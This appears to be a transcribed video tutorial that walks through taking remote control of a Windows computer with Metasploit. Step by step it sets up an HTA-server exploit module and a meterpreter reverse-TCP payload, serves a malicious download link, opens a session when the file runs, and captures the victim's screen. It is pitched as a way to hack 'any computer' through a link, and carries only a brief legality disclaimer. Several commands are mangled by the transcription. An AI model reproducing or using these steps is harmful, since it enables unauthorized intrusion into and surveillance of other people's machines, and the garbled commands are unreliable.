Hello everyone, welcome back to my channel. In this video, I'm going to be teaching you all how to take remote access to a computer. Any computer actually. So, disclaimer, hacking is illegal. If you want to practice hacking, do it on your own computer and in your own atmosphere. So the first command is ifconfig. We will type this to get the IP address of our computer, Linux machine. And the next thing is we will start up our MSF console and start it. So this might take a while. So basically what we will do is we will generate a website which will generate a file in it to hack the computer. So now we will type use exploit slash windows slash miscellaneous slash hda underscore server and we will press enter. So we have run it, and the next thing we will type is set server host, and now we will set the host of a server. The IP address we copied and enter. And the next thing we will type is set payload windows slash meterpreter slash reverse underscore tcp, enter. So now we will set airport 811 and enter. So now we will start the hacking server. So we will write exploit. So as you can see, it has generated a URL which will have a file which will hack into the computer. So I just ran that file in the other machine. And it has gathered a session, and now we will do sessions dash dash one, enter. Session 1 opened, so we will type help. So as you can see, there are many things we can do right now. We can just screenshot it, the other thing, the computer, and we can do that. So we can even screen share what is it saying. So I'm just going to see all the commands and now enter screen shot. Oh wait a second, I think I will have to rerun that link. So I'm going to copy link this. I will copy this link, or it is this one. So I guess I will copy it, and I'm just going to run it in my computer. So it just downloaded a file into my computer, and I will save the file. Okay, I have saved the file which it downloaded, and now I will run that file. So it's right here in the downloads, and it's right here, and I will save file and okay. So I've done that, and I will close the tabs, and I will go back to my terminal. So now there's a new set of IP addresses here. So I will do sessions. Now there's a computer right here, so I'm going to do sessions dash dash one, and I have started the interaction with the session. So now I can grab the screenshot of that computer. What is it looking at? So it's right here. I'm going to copy this and I'm going to check that screenshot out real quick. So it is this one, yeah. And as you can see, I ran that file on my host computer. So this is what my host computer is looking at, and it has gathered the screenshot. So isn't it, as you can see, it is how easy it is to just hack into a computer with a website link which contains a file with a virus. Thanks for watching. Bye.